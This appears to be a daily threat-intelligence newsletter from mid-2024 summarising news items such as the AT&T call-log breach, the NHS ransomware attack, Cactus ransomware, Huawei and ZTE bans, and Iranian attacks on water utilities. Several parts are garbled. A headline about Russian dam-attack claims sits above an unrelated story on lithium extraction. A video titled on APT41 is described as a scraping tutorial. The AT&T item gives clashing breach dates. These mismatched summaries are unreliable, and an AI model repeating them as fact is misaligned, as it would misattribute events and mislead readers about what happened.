Daily Drop (816): NHS | AT&T | Huawei & ZTE | U.S. Aging DAMs | ADF: AU SPY | HMAS Anzac | JN: HPE | Intel | UA: RU DAM Claims | AI: Strawberry | Cactus | DPRK Drones | CN AI: G42 | IR: Water
07-15-24
Sunday, Jul 15 2024 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding the Proof Of Concepts (PoC) if available for mentioned CVE’s :
A Proof of Concept (PoC) is a small exercise to test a certain hypothesis or demonstrate that a potential project can be viable. It's primarily used to verify that certain concepts or theories have the potential for real-world application. The purpose of a PoC is to showcase the feasibility, functionality, and potential of a concept before proceeding to the development of the full-scale project. *
Hackers Stole ‘Nearly All’ Call Logs Over Six Months from AT&T
Bottom Line Up Front (BLUF): Hackers breached AT&T's data storage on Snowflake, stealing metadata from nearly all call logs and texts of AT&T customers over six months in 2022. The breach impacted approximately 109 million accounts, exposing telephone numbers and interaction details.
Analyst Comments: This incident underscores the vulnerabilities in third-party cloud storage platforms and the critical need for robust security measures. It highlights the potential risks to national security and public safety posed by such breaches, given the scale of data exposed. The delay in public reporting, facilitated by DOJ exemptions, emphasizes the delicate balance between transparency and operational security during ongoing investigations.
FROM THE MEDIA: AT&T revealed that hackers accessed its data storage on Snowflake between April 14 and April 25, 2023, stealing aggregated metadata from calls and texts made by its customers. The data did not include content but comprised telephone numbers, interaction counts, and call durations. The breach affected both AT&T wireless customers and those using mobile virtual network operators (MVNO) on AT&T’s network. AT&T notified the FBI and received DOJ exemptions to delay public reporting, citing national security concerns. This breach follows previous security incidents involving AT&T, reflecting ongoing challenges in securing customer data against sophisticated cyber threats.
READ THE STORY: The Record // Wired // THN
OpenAI Working on New Reasoning Technology Under Code Name ‘Strawberry’
Bottom Line Up Front (BLUF): OpenAI is developing a new AI project called "Strawberry" to enhance its models' reasoning capabilities, aiming to enable them to perform autonomous and complex tasks, including deep research and long-term planning.
Analyst Comments: The Strawberry project represents a significant leap in AI development, focusing on improving reasoning skills that are crucial for achieving human-like intelligence. This initiative aligns with industry trends where major AI players are striving to overcome the current limitations of large language models, particularly in logical reasoning and problem-solving.
FROM THE MEDIA: OpenAI is secretly working on a project named "Strawberry," designed to boost the reasoning capabilities of its AI models. The initiative aims to allow AI to autonomously navigate the internet and perform in-depth research, a challenging feat for current AI technologies. Internal documents reviewed by Reuters reveal that Strawberry employs a specialized post-training process to refine AI models. This technology is expected to enable AI to handle long-horizon tasks, requiring advanced planning and execution over extended periods. While specifics remain under wraps, OpenAI's goal is to significantly enhance AI reasoning, a critical component for achieving higher levels of intelligence and practical applications in various fields.
READ THE STORY: Reuters
White House Urged to Double Check Microsoft Isn't Funneling AI to China via G42 Deal
Bottom Line Up Front (BLUF): House committee chairs Michael McCaul and John Moolenaar have requested the White House investigate Microsoft's $1.5 billion deal with UAE-based G42 over concerns it could inadvertently transfer advanced AI technology to China.
Analyst Comments: This scrutiny reflects ongoing geopolitical tensions and the complex interplay between technology, national security, and international relations. The concerns underscore the need for stringent safeguards when U.S. companies engage in significant tech investments abroad, particularly in regions with close ties to China. The situation highlights the importance of robust measures to prevent the unintentional transfer of sensitive technologies to adversarial nations.
FROM THE MEDIA: House committee leaders Michael McCaul and John Moolenaar have sent a letter to the White House urging an investigation into a deal between Microsoft and G42, a UAE-based AI research firm. The $1.5 billion investment by Microsoft aims to foster AI development in the Middle East. However, concerns have arisen due to G42's previous ties to China, prompting fears that American AI technology could be funneled to Beijing. Although both Microsoft and G42 have assured that appropriate security measures will be in place, such as restricted access to AI technologies, the House committee chairs remain skeptical and seek a detailed review to ensure U.S. national security interests are protected.
READ THE STORY: The Register
America’s Aging Dams Are a Catastrophe Waiting to Happen
Bottom Line Up Front (BLUF): Climate change is exacerbating the vulnerability of nearly 92,000 aging dams in the United States. Many of these dams, over a century old, are increasingly at risk from extreme weather events, highlighting an urgent need for infrastructure investment and renovation.
Analyst Comments: The partial failure of the Rapidan Dam in Minnesota serves as a stark reminder of the critical state of America's infrastructure. As climate change intensifies, the frequency and severity of extreme weather events are rising, pushing the limits of these aging dams. With many no longer serving their original purposes, the decision to repair, replace, or remove these structures is crucial. This situation calls for significant federal and state intervention, both in terms of funding and policy, to ensure public safety and environmental health.
FROM THE MEDIA: The recent partial failure of the Rapidan Dam in Minnesota, amidst historic flooding, brought attention to the broader issue of America's aging dams. Built in the early 1900s, many of these structures are now over 100 years old and increasingly vulnerable to extreme weather. An analysis by Inside Climate News of federal data revealed nearly 4,100 dams nationwide are in poor or unsatisfactory condition, with hundreds posing significant risks to human life and property. The Infrastructure Investment and Jobs Act allocated $3 billion for dam-related projects, yet the challenge remains daunting as communities grapple with the high costs and complexities of necessary repairs or removals. Efforts in states like Minnesota and Michigan showcase both the potential solutions and the formidable obstacles in addressing this widespread infrastructure crisis.
READ THE STORY: Wired // Inside Climate News
Advanced laser anti-aircraft system set to enhance South Korea's defense capabilities against North Korea's drone provocations.
Bottom Line Up Front (BLUF): South Korea has initiated a project to deploy laser-powered anti-aircraft weapons, known as the "Star Wars project," to counter North Korean drones. This innovative system, developed by Hanwha Aerospace Co., will be operational this year and represents a significant advancement in military technology.
Analyst Comments: The deployment of laser-based anti-aircraft systems marks a strategic upgrade in South Korea's defense infrastructure, particularly in response to the evolving drone threats from North Korea. This technology not only offers a cost-effective solution, with each shot costing approximately $1.45 in energy but also represents a shift towards futuristic defense mechanisms that could potentially counter more sophisticated threats like aircraft and missiles in the future.
FROM THE MEDIA: South Korea's Defense Acquisition Program Administration (DAPA) announced the "Star Wars project," aiming to neutralize drones using laser technology. The lasers, which are silent and invisible, require only electricity to operate and have shown a 100% success rate in tests. Developed by Hanwha Aerospace Co., the system is set to be mass-produced and delivered to the military this year. The project has received ₩87.1 billion ($63.2 million) in investment since 2019 and could eventually be upgraded to counter aircraft and ballistic missiles. This initiative is part of South Korea's broader strategy to bolster its defenses against North Korean provocations, which include the use of drones for surveillance and even balloons loaded with garbage to disrupt the South.
READ THE STORY: The Register
Russian-born Australian Army Private and Her Husband Charged with Espionage
Bottom Line Up Front (BLUF): Kira and Igor Korolev, a Russian-born couple residing in Brisbane, have been charged with espionage for allegedly stealing sensitive Australian Defense Force (ADF) material to provide to Russian intelligence. They face up to 15 years in prison if convicted.
Analyst Comments: This case highlights potential vulnerabilities in the vetting and security clearance processes within the Australian Defense Force. The use of new espionage laws reflects Australia's commitment to counter foreign interference, particularly from countries like Russia. This incident underscores the importance of stringent background checks and continuous monitoring of personnel with access to sensitive information, especially those with foreign ties.
FROM THE MEDIA: Kira Korolev, a 40-year-old IT private in the Australian Army, and her 62-year-old husband, Igor, have been arrested on charges of espionage. The Australian Federal Police (AFP) alleges that Kira instructed Igor to access her ADF work account and send classified information to her while she was in Russia. This case is the first to use new espionage laws introduced in 2018, which aim to counteract foreign interference and protect national security. The investigation is ongoing, with authorities examining whether the couple had long-term intentions to spy for Russia or were recent recruits. Both have been remanded in custody until their next court appearance in September.
Russian Student Sentenced to 5 Years for Collecting Sensitive Military Data for Ukraine’s Security Services
Bottom Line Up Front (BLUF): A Russian student was sentenced to five years in a maximum security colony for collecting and passing information about Russian troop locations to Ukraine's security service, the SBU. This case highlights ongoing espionage activities amid the Russia-Ukraine conflict.
Analyst Comments: The sentencing of the Russian student for espionage activities reflects the heightened state of intelligence warfare between Russia and Ukraine. This incident underscores the persistent risks and the strategic importance of cyber and human intelligence in modern conflicts. The swift judicial process and the student's admission of guilt indicate the Russian authorities' strong stance on internal security breaches.
FROM THE MEDIA: Russia’s Federal Security Service (FSB) reported that the student, residing in the Siberian city of Birobidzhan, was caught collecting and transmitting sensitive military data to Ukraine’s security service (SBU). Despite his full cooperation and admission of guilt, he received a five-year sentence. This case is one among many recent espionage activities, with both Russia and Ukraine actively detaining individuals for similar offenses. Earlier, Ukraine’s cyber police arrested a man posing as a food delivery courier for collecting data on military and critical infrastructure sites. Such incidents illustrate the ongoing cyber and intelligence battles amid the ongoing conflict.
READ THE STORY: The Record // RIA
Germany to Bar Chinese Companies' Components from Core Parts of Its 5G Networks
Bottom Line Up Front (BLUF): Germany will ban the use of critical components from Chinese companies Huawei and ZTE in its 5G networks, starting with core parts by 2026 and expanding to include critical management systems in access and transport networks by 2029. This decision aims to mitigate cybersecurity risks and reduce dependency on Chinese technology.
Analyst Comments: Germany’s phased ban on Huawei and ZTE components from its 5G infrastructure underscores escalating concerns over cybersecurity and espionage. Aligning with similar actions by other Western nations, this move reflects a strategic shift towards securing telecommunications infrastructure against potential threats. It also highlights Germany’s broader strategy to reduce economic dependencies on China, despite ongoing economic ties and collaboration on global issues such as climate change.
FROM THE MEDIA: Germany, Europe's largest economy, announced that critical components from Chinese firms Huawei and ZTE will be excluded from its 5G core networks by the end of 2026, and from critical management systems in 5G access and transport networks by 2029. Interior Minister Nancy Faeser emphasized that this decision aims to protect Germany's communication infrastructure from security risks. Despite Huawei’s denial of any cybersecurity threats posed by its technology, the German government remains focused on reducing vulnerabilities and dependencies. This decision follows similar measures by countries like the US, UK, and Australia, reflecting growing Western apprehensions about Chinese technology in critical infrastructure.
READ THE STORY: CNN // AP // The Washington Post
HMAS Anzac Decommissioned for New Fleet of General-Purpose Frigates
Bottom Line Up Front (BLUF): HMAS Anzac is being decommissioned to make way for Australia's new fleet of general-purpose frigates. South Korea is positioning itself to secure the contract, with ongoing discussions about enhanced defense cooperation and joint exercises.
Analyst Comments: The decommissioning of HMAS Anzac and the introduction of new general-purpose frigates signify Australia's commitment to modernizing its naval capabilities. South Korea's active pursuit of the frigate contract, coupled with its recent success in securing an Australian Army vehicle contract, underscores its strategic push to deepen defense ties with Australia. This potential collaboration within the AUKUS framework and beyond highlights the evolving security dynamics in the Indo-Pacific region, particularly in response to increasing geopolitical tensions.
FROM THE MEDIA: Almost a year after securing a multi-billion-dollar contract to build Australian Army vehicles, South Korea is actively promoting closer defense ties with Australia. South Korean Vice-Defence Minister Kim Seon-ho is in Canberra to discuss future cooperation on AUKUS Pillar 2 projects and to advocate for South Korea's bid to supply the Royal Australian Navy with new general-purpose frigates. The discussions also include increasing joint military and cyber exercises. This week, South Korea supported an Australian-led accusation against Beijing for large-scale cyber espionage. The final bids for the frigate project, which involves competitors from Japan, Spain, Germany, and South Korea, are nearing completion .
READ THE STORY: MSN
Labour Launches Cyber Security Crackdown on Russia and China After NHS Hack
Bottom Line Up Front (BLUF): In response to a recent cyberattack on the NHS, the UK government plans to introduce stricter regulations to prevent cyber threats from Russia and China. The new measures will focus on securing third-party contractors involved in essential public services.
Analyst Comments: The UK's decision to tighten cybersecurity regulations following the NHS hack highlights the increasing threat of cyberattacks on critical infrastructure. This move reflects a broader trend among Western nations to bolster cyber defenses against perceived threats from state actors like Russia and China. Strengthening rules for third-party contractors is a crucial step in addressing vulnerabilities in supply chains and ensuring comprehensive protection of public services.
FROM THE MEDIA: The UK government is expected to announce new cybersecurity measures to combat threats from Russia and China, following a severe ransomware attack on the NHS last month. The attack, attributed to the Russian cybercriminal group Qilin, disrupted services at two London hospital trusts, leading to the postponement of over 800 operations and 700 outpatient appointments, including critical cancer treatments. The new regulations will require all providers of essential infrastructure, including third-party contractors, to implement robust cybersecurity measures. This initiative aims to enhance the resilience of the UK's public services against digital attacks and learn from past incidents to improve future responses.
READ THE STORY: The Telegraph
Game Developer Accuses Intel of Selling 'Defective' Raptor Lake CPUs
Bottom Line Up Front (BLUF): Alderon Games, an indie game developer, has publicly criticized Intel's 13th and 14th-generation Core microprocessors, claiming they are defective. The studio reports significant stability issues with these CPUs, leading to frequent crashes and memory corruption. In response, Alderon Games is transitioning all their servers to AMD processors.
Analyst Comments: Intel's ongoing issues with its Raptor Lake CPUs highlight the challenges tech companies face in balancing performance and stability. Alderon Games' switch to AMD underscores a growing frustration within the industry regarding Intel's inability to resolve these problems promptly. This situation could impact Intel's reputation and market share, particularly if more developers and consumers follow suit. Intel must address these concerns transparently to restore confidence in its products.
FROM THE MEDIA: Alderon Games, known for the multiplayer game "Path of Titans," has encountered severe stability problems with Intel's 13th and 14th-generation Core CPUs, leading to crashes and memory corruption. Despite Intel's efforts to mitigate these issues through microcode, BIOS, and firmware updates, the problems persist. Alderon Games reports nearly a 100% failure rate over time with these processors and has decided to switch all its servers to AMD chips, citing significantly fewer crashes. The studio is advising players and server hosts to avoid Intel's Raptor Lake processors, even implementing in-game notifications to warn users. Intel has acknowledged the instability issues and continues to investigate, urging affected customers to contact support.
READ THE STORY: AG // The Register
Ukraine Dismisses Russian Allegations of Planned Dam Attacks
Bottom Line Up Front (BLUF): International Battery Metals (IBAT) has successfully commercialized a novel direct lithium extraction (DLE) technology, marking a significant milestone for the lithium industry. This new approach promises to revolutionize lithium production by being faster, more efficient, and environmentally friendly.
Analyst Comments: The commercialization of IBAT's DLE technology is poised to transform the global lithium supply chain, crucial for the burgeoning electric vehicle (EV) market. This breakthrough addresses long-standing issues in traditional lithium extraction methods, such as high water use and long production times. By utilizing portable, modular plants, IBAT offers a scalable and relocatable solution that can be rapidly deployed to various brine sources globally. The technology’s ability to recycle over 98% of the water used further underscores its environmental benefits. This innovation not only enhances the efficiency of lithium extraction but also positions IBAT as a key player in the sustainable energy sector.
FROM THE MEDIA: International Battery Metals (IBAT) has become the first company to commercially produce lithium using a novel filtration-based DLE technology. At a site in Utah, IBAT is producing nearly 5,000 metric tons of lithium per year. This portable plant design allows for scalable and relocatable production, with each plant capable of being moved and reused at new deposits, significantly reducing construction costs. This method also recycles over 98% of water used, addressing one of the major environmental concerns in lithium production.
READ THE STORY: Reuters
HPE to Build Japan's Fastest AI Supercomputer
Bottom Line Up Front (BLUF): Hewlett Packard Enterprise (HPE) will construct a cutting-edge supercomputer for Japan's National Institute of Advanced Industrial Science and Technology (AIST), leveraging Nvidia's H200 GPUs. This project, supported by Japan's Ministry of Economy, Trade and Industry, aims to advance AI research and fortify Japan's AI sovereignty.
Analyst Comments: The development of ABCI 3.0 signifies Japan's commitment to maintaining a competitive edge in AI research. This move aligns with global trends where nations invest heavily in AI infrastructure to ensure technological self-reliance and foster innovation. The involvement of Nvidia and the use of advanced Cray XD systems highlight the importance of integrating high-performance computing resources to support large-scale AI models and applications.
FROM THE MEDIA: HPE is set to build a new supercomputer for Japan's AIST, utilizing Nvidia's latest H200 GPUs to support generative AI research. The ABCI 3.0 will be offered as a cloud service to the public and private sectors, aiming to boost innovation and research. The system, featuring Cray XD technology and Intel's 5th Gen Xeon Scalable processors, is projected to be Japan's fastest AI supercomputer with a theoretical maximum performance of 6.2 exaflops. This initiative, part of a broader $1 billion investment by Japan's METI, underscores the strategic importance of AI sovereignty and infrastructure development as articulated by Nvidia's CEO, Jensen Huang.
READ THE STORY: The Register
Cactus Ransomware: New Strain in the Market
Bottom Line Up Front (BLUF): Cactus ransomware, active since March 2023, targets organizations via VPN vulnerabilities, implementing double extortion by encrypting files and threatening data leaks. Its advanced encryption techniques and strategic use of open-source tools and scripts make it a formidable threat to cybersecurity.
Analyst Comments: Cactus ransomware's emergence and persistent threat underscore the evolving sophistication of cybercriminal tactics. By exploiting specific VPN vulnerabilities and employing advanced encryption methods, Cactus exemplifies the need for continuous vigilance and robust cybersecurity measures. Organizations must prioritize patch management, employee training, and comprehensive security protocols to mitigate such risks.
FROM THE MEDIA: Cactus ransomware, which surfaced in March 2023, has been identified as a significant threat, targeting over 100 entities up until April 2024. It exploits VPN vulnerabilities, particularly in Fortinet's network, to gain initial access. Once inside, attackers use SSH backdoors, network scanning tools like SoftPerfect and PSNmap, and remote management software for persistence. The ransomware employs RSA and AES encryption, leveraging OpenSSL libraries, and uses scheduled tasks for persistence. It also disables antivirus software and creates new admin accounts to facilitate data exfiltration and system compromise. The exfiltration process involves RClone for cloud storage, followed by a PowerShell script to execute the ransomware payload across the network. The encryption process is meticulous, targeting specific file types and employing sophisticated encryption keys.
READ THE STORY: Tech Nadu // Trellix
US Scrambles to Stop Iranian Hackers Known as the ‘Cyber Avengers’ From Hitting Water Utilities
Bottom Line Up Front (BLUF): The U.S. government is urgently working to protect water utilities from cyberattacks by the "Cyber Avengers," a group linked to Iran’s Islamic Revolutionary Guard Corps (IRGC). These hackers target Israeli-made industrial devices used in water utilities, exploiting vulnerabilities to breach systems.
Analyst Comments: This incident highlights the critical need for robust cybersecurity measures in protecting vital infrastructure. The attacks by the IRGC-linked group underline the persistent threat posed by state-sponsored cyber actors. Immediate actions, such as removing vulnerable devices from the internet and updating security protocols, are essential to safeguard against potential disruptions to water supplies.
FROM THE MEDIA: The U.S. government is scrambling to determine the number of water utilities at risk from the "Cyber Avengers," a hacker group linked to Iran's IRGC. These hackers have breached multiple water utilities by exploiting vulnerabilities in Israeli-made industrial devices. Despite some utilities voluntarily reporting intrusions, the exact number of affected facilities remains unclear due to non-mandatory reporting requirements. Federal agencies, including CISA and the FBI, are advising utilities to enhance security measures, such as changing default passwords, disconnecting vulnerable devices from the internet, and enabling multi-factor authentication. Although no disruptions to water supply have been reported, the potential for severe consequences necessitates prompt and comprehensive defensive actions.
READ THE STORY: MSN
Items of interest
Bridging the Gap Between Job Seekers and Employers in India's Competitive Market
Bottom Line Up Front (BLUF): This study by Ashutosh Kumar, Kinshuk Chauhan, and Jaspreet Kaur Grewal from Chandigarh University investigates the potential of web scraping technology to enhance job portals in India. By automating data extraction from various job websites, the research aims to streamline the job search process, making it more efficient and user-friendly. The study focuses on methodologies, tools, and technologies employed in web scraping to provide insights into the most in-demand skills and job opportunities in the Indian IT industry.
Analyst Comments: Web scraping offers a promising solution to the fragmented job search process in India, where millions of graduates enter the job market annually. Traditional job search methods often fall short in matching candidates with suitable positions due to outdated information and limited reach. By leveraging web scraping tools like BeautifulSoup and Scrapy, job portals can continuously update job listings and provide personalized recommendations to job seekers. This not only enhances the user experience but also ensures that employers receive applications from candidates whose skills closely align with job requirements. The integration of such technology is poised to revolutionize e-recruitment in India's dynamic job market.
FROM THE MEDIA: India produces millions of graduates annually, leading to intense competition in the job market. Job seekers often struggle to find positions that match their skills and interests due to a lack of detailed information about job openings and company operations. This study explores the use of web scraping to extract data from job portals, aiming to provide job seekers with up-to-date information on job opportunities and required skills. The research highlights the importance of tools like BeautifulSoup, Selenium, and Scrapy in automating data collection and parsing, enabling the creation of a more efficient job search platform. Enhanced user features such as real-time updates, personalized job recommendations, and improved user interfaces are also discussed. The findings suggest that web scraping can significantly improve the job search experience by providing timely and relevant job listings, thereby helping bridge the gap between employers and job seekers.
READ THE STORY: SCRS
Puppeteer: Headless Automated Testing, Scraping, and Downloading (Video)
FROM THE MEDIA: This tutorial walks you through every thing you need to know about Puppeteer and headless browsers, so you can automate website testing, web scraping, fetching and downloading content, and more.
Nullcon Berlin 2024 | How Things Are Going For APT41 In 2024 (Video)
FROM THE MEDIA: This video tutorial demonstrates how to efficiently scrape product review data from websites using Selenium, combined with techniques for handling JSON APIs, emphasizing the importance of choosing the right tools and methods for web scraping tasks.
The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.